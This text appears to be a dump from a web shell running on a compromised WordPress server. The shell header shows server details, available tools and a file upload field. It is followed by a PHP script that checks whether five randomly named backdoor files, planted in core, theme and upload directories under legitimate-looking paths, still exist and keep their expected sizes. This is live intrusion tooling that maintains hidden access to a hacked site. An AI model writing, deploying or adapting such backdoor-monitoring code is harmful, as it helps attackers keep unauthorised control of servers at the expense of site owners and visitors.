| Server IP : 65.108.144.40 / Your IP : 216.73.217.165 Web Server : Apache/2.4.52 (Ubuntu) System : Linux ubuntu-8gb-hel1-1 5.15.0-173-generic #183-Ubuntu SMP Fri Mar 6 13:29:34 UTC 2026 x86_64 User : dev ( 1000) PHP Version : 8.2.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/html/support/wp-admin/maint/ |
Upload File : |
<?php $r = '/var/www/html/support'; $x = ["/wp-admin/css/colors/blue/CewpXgoqw.php"=>"bd@@7089574@@32",
"/wp-admin/maint/nCrDacz.php"=>"bd@@6939670@@77",
"/wp-includes/sodium_compat/src/Core/ChaCha20/wp/pqmmOYRUup.php"=>"bd@@5855656@@69",
"/wp-content/uploads/2014/02/wp/PPVGC.php"=>"bd@@7148568@@58",
"/wp-content/themes/twentytwenty/inc/wp-blog-header.php"=>"bd@@5866022@@88"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');